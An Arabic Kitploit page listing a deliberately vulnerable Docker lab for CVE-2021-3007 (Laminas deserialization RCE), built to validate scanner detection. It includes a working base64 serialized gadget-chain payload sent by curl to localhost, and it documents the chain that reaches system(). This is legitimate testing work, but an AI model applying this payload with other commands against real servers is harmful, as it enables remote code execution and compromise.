Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2021-3007-vulnerable — بيئة اختبار معرضة للثغرات CVE-2021-3007 - Laminas/Zend Framework Deserialization RCE | Kitploit
أدوات/GitHubGitHub/kre80r/cve-2021-3007-vulnerable
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubkre80r/cve-2021-3007-vulnerable

cve-2021-3007-vulnerable

بيئة اختبار معرضة للثغرات CVE-2021-3007 - Laminas/Zend Framework Deserialization RCE

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

بيئة اختبار معرضة للثغرات CVE-2021-3007

Docker CVE CVSS

بيئة اختبار معرضة للثغرات عن قصد للتحقق من اكتشاف CVE-2021-3007 في الماسحات الأمنية.

نظرة عامة على الثغرة

السمةالقيمة
معرف CVECVE-2021-3007
الخطورةحرجة (CVSS 9.8)
النوعإلغاء تسلسل غير آمن → تنفيذ تعليمات برمجية عن بُعد (RCE)
المتأثرLaminas HTTP < 2.14.2, Zend Framework 3.0.0
CWECWE-502 (إلغاء تسلسل بيانات غير موثوقة)

البدء السريع

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2021-3007-vulnerable
cd CVE-2021-3007-vulnerable

# Start vulnerable environment
docker-compose up -d

# Verify it's running
curl http://localhost:8080

# Test with nuclei (optional)
nuclei -t CVE-2021-3007.yaml -u http://localhost:8080

# Cleanup
docker-compose down

سطر واحد

root@kitploit:~
docker-compose up -d && sleep 3 && curl -s http://localhost:8080 | head -1

اختبار الاستغلال اليدوي

root@kitploit:~
# Send serialized payload triggering RCE
curl -X POST http://localhost:8080/ \
  -d "data=TzoyODoiTGFtaW5hc1xIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086Mjg6IkxhbWluYXNcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMzoiTGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQ0OiIATGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoyMToiTGFtaW5hc1xDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjE3OiJmaWxlX2dldF9jb250ZW50cyI7fX19czoxMzoiACoAYXR0cmlidXRlcyI7YToxOntzOjIyOiJlY2hvIG51Y2xlaUNWRTIwMjEzMDA3IjtpOjE7fX19"

# Expected: Response contains "nucleiCVE20213007" confirming RCE

التفاصيل الفنية

سلسلة الأدوات (Gadget Chain)

root@kitploit:~
Laminas\Http\Response\Stream::__destruct()
  └─► Laminas\View\Helper\Gravatar::__toString()
        └─► Laminas\View\Renderer\PhpRenderer::plugin()
              └─► Laminas\Config\Config::get()
                    └─► system() / file_get_contents()

المكونات المعرضة للثغرة

الحزمةالإصدارالغرض
laminas/laminas-http2.14.1مكوّن HTTP المعرض للثغرة
laminas/laminas-view2.12.0مكوّن سلسلة الأدوات
laminas/laminas-config3.7.0مكوّن سلسلة الأدوات

نقاط النهاية المعرضة للثغرة

يقبل التطبيق بيانات مُسلسَلة عبر POST:

  • المسار: / أو /index.php
  • المعلمات: data، payload، serialized
  • الترميز: Base64

تفاصيل البيئة

المكوّنالقيمة
الصورة الأساسيةphp:8.1-apache
المنفذ8080
الحاويةcve-2021-3007-vulnerable

الملفات

root@kitploit:~
.
├── Dockerfile          # Container build configuration
├── docker-compose.yml  # Orchestration (one-shot setup)
├── index.php           # Vulnerable PHP application
├── LICENSE             # MIT License
└── README.md           # This file

إشعار أمني

تحذير: هذه البيئة معرضة للثغرات عن قصد لأغراض الاختبار الأمني فقط.

لا تفعل:

  • تعريضها للشبكات العامة
  • نشرها في بيئات الإنتاج
  • تركها تعمل دون مراقبة
  • استخدامها لأغراض خبيثة

افعل:

  • استخدامها في بيئات اختبار معزولة
  • إيقاف الحاويات عند عدم استخدامها
  • استخدامها لأغراض البحث الأمني المشروع فقط

المراجع

  • NVD - CVE-2021-3007
  • GitHub Advisory - GHSA-xx8f-qf9f-5fgw
  • الإصدار الأمني لـ Laminas
  • CheckPoint Research - FreakOut
  • Ambionics Research

الترخيص

رخصة MIT - لأغراض البحث الأمني والتعليم فقط.


أُنشئ للتحقق من صحة قوالب nuclei | projectdiscovery/nuclei-templates

تنزيل الأداة